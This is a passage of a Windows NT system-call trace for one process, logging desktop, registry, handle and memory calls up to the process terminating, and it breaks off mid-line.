 03360   748   NtUserValidateHandleSecure  (65690, ... ) == 0x1
 03361   748   NtUserValidateHandleSecure  (327774, ... ) == 0x1
 03362   748   NtUserQueryWindow  (327774, 0, ... ) == 0x6b8
 03363   748   NtUserQueryWindow  (327774, 1, ... ) == 0x6bc
 03364   748   NtUserValidateHandleSecure  (327774, ... ) == 0x1
 03365   748   NtUserCloseDesktop  (60, ... ) == 0x1
 03366   748   NtUserGetProcessWindowStation  (... ) == 0x1c
 03367   748   NtUserOpenDesktop  ({24, 28, 0x40, 0, 0,  ({24, 28, 0x40, 0, 0, "Disconnect"}, 1, 0x41, ... ) }, 1, 0x41, ... ) == 0x0
 03368   748   NtUserGetProcessWindowStation  (... ) == 0x1c
 03369   748   NtUserOpenDesktop  ({24, 28, 0x40, 0, 0,  ({24, 28, 0x40, 0, 0, "Winlogon"}, 1, 0x41, ... ) }, 1, 0x41, ... ) == 0x0
 03370   748   NtGdiDeleteObjectApp  (856294625, ... ) == 0x1
 03371   748   NtGdiDeleteObjectApp  (1376388660, ... ) == 0x1
 03372   748   NtClose  (52, ... ) == 0x0
 03373   748   NtSetInformationThread  (-2, ZeroTlsCell, {ZeroTlsCell=0x6,}, 4, ... ) == 0x0
 03374   748   NtSetInformationThread  (-2, ZeroTlsCell, {ZeroTlsCell=0x4,}, 4, ... ) == 0x0
 03375   748   NtSetInformationThread  (-2, ZeroTlsCell, {ZeroTlsCell=0x3,}, 4, ... ) == 0x0
 03376   748   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize"}, ... 52, ) }, ... 52, ) == 0x0
 03377   748   NtQueryValueKey  (52,  (52, "DisableMetaFiles", Partial, 20, ... ) , Partial, 20, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03378   748   NtClose  (52, ... ) == 0x0
 03379   748   NtClose  (44, ... ) == 0x0
 03380   748   NtClose  (112, ... ) == 0x0
 03381   748   NtFreeVirtualMemory  (-1, (0xdb0000), 4096, 32768, ... (0xdb0000), 4096, ) == 0x0
 03382   748   NtQueryInformationProcess  (-1, 36, 4, ... {process info, class 36, size 4}, 0x0, ) == 0x0
 03383   748   NtQueryInformationProcess  (-1, 36, 4, ... {process info, class 36, size 4}, 0x0, ) == 0x0
 03384   748   NtQueryVirtualMemory  (-1, 0x41dee2, Basic, 28, ... {BaseAddress=0x41d000,AllocationBase=0x400000,AllocationProtect=0x80,RegionSize=0x1c000,State=0x1000,Protect=0x40,Type=0x1000000,}, 28, ) == 0x0
 03385   748   NtRequestWaitReplyPort  (24, {20, 48, new_msg, 0, 0, 1400648, 0, 0}  (24, {20, 48, new_msg, 0, 0, 1400648, 0, 0} "\0\0\0\0\3\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0" ... {20, 48, reply, 0, 484, 748, 59161, 0} "\0\0\0\0\3\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0" )  ... {20, 48, reply, 0, 484, 748, 59161, 0}  (24, {20, 48, new_msg, 0, 0, 1400648, 0, 0} "\0\0\0\0\3\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0" ... {20, 48, reply, 0, 484, 748, 59161, 0} "\0\0\0\0\3\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0" )  ) == 0x0
 03386   748   NtTerminateProcess  (-1, 0, ...